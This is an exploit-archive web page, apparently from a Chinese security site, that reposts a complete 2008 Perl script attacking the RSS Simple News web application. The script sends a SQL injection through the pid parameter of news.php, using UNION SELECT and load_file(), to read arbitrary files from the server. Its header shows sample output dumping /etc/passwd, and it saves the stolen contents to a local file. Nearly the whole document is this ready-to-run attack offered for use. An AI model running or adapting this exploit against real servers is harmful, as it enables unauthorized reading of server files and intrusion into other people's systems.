首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 RSS Simple News (news.php pid) Remote SQL Injection Exploit 来源：piker(dot)ther00t(at)gmail(dot)com 作者：Piker 发布时间：2008-12-23   #!/usr/bin/perl ################################ ##    Coded by Piker [piker(dot)ther00t(at)gmail(dot)com] ##      D.O.M Team ## piker,ka0x,an0de,xarnuz ## 2008 Security Researchers ################################ ## ## RSS Simple News Remote SQL Injection Exploit ## http://sourceforge.net/projects/rss-simple-news/ ## ##   This exploit tries to read an ##   arbitrary file. ## ##   It needs magic_quotes_gpc=off ## ################################ # piker@domlabs:~/advisories$ perl rss.pl http://localhost/rss /etc/passwd #[+] File HEX: 0x2f6574632f706173737764 #[+] Host: http://localhost/rss/ #[+] File content: #daemon:x:1:1:daemon:/usr/sbin:/bin/sh #bin:x:2:2:bin:/bin:/bin/sh #sys:x:3:3:sys:/dev:/bin/sh #sync:x:4:65534:sync:/bin:/bin/sync #games:x:5:60:games:/usr/games:/bin/sh # [...] #[+] EOF # # use LWP::UserAgent; open(FILE, ">&STDOUT"); my $host = $ARGV[0]; my $file = $ARGV[1]; die &_USO unless $ARGV[1]; sub _USO {     die "     RSS Simple News Remote Sql Injection Exploit     This exploit tries to read an     arbitrary file.     It needs magic_quotes_gpc=off     usage: ./$0 <host> <file_you_want>     ex: ./$0 http://localhost/rss/ /etc/passwd     "; } my $ua = LWP::UserAgent->new() or die; $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1"); my $tmp="0x"; my $tmp2; foreach my $c (split(//, $file)){     $tmp2 = sprintf ("%x", ord($c));     $tmp .= $tmp2; } print FILE "[+] File HEX: ".$tmp."\n"; if ($host !~ /\/$/){ $host .= "/"; } print FILE "[+] Host: ".$host."\n"; my $req = HTTP::Request->new(GET => $host."news.php?pid=-1' union select 1,2,3,4,CONCAT(0x3c46494c453e,load_file(".$tmp."),0x3c46494c453e),6 and 'a'='a"); my $res = $ua->request($req); my $con = $res->content; my $ok = 0; open (OUT, ">result.txt"); if ($res->is_success){     foreach my $linea (split(/\n/, $con)){         if($ok == 1){             if ($linea !~ /<FILE>/){                 print FILE $linea."\n";         print OUT $linea."\n";             }else{                 print FILE "\n[+] EOF\n";         print "\n[+] File saved into 'result.txt'\n";                 goto salida;             }         }         if($linea =~ /<FILE>/i && $ok == 0){             $ok = 1;             print FILE "[+] File content: \n";         }     }     salida:     if ($ok == 0){         print FILE "[-] Exploit Failed!\n";     }      } else{     print FILE "[-] Exploit Failed!\n"; } close(FILE); close(OUT); #EOF   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·CoolPlayer 2.19 (Skin File) Lo ·Pligg 9.9.5b (check_url.php ur ·Linksys Wireless ADSL Router ( ·YourPlace <= 1.0.2 Multiple Re ·CoolPlayer 2.19 (Skin File) Lo ·OneOrZero helpdesk 1.6.*. Remo ·SolarCMS 0.53.8 (Forum) Remote ·ReVou Twitter Clone Admin Pass ·MyPBS (index.php seasonID) Rem ·Avahi < 0.6.24 (mDNS Daemon) R ·CUPS < 1.3.8-4 (pstopdf filter ·Mozilla Firefox 3.0.5 location   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved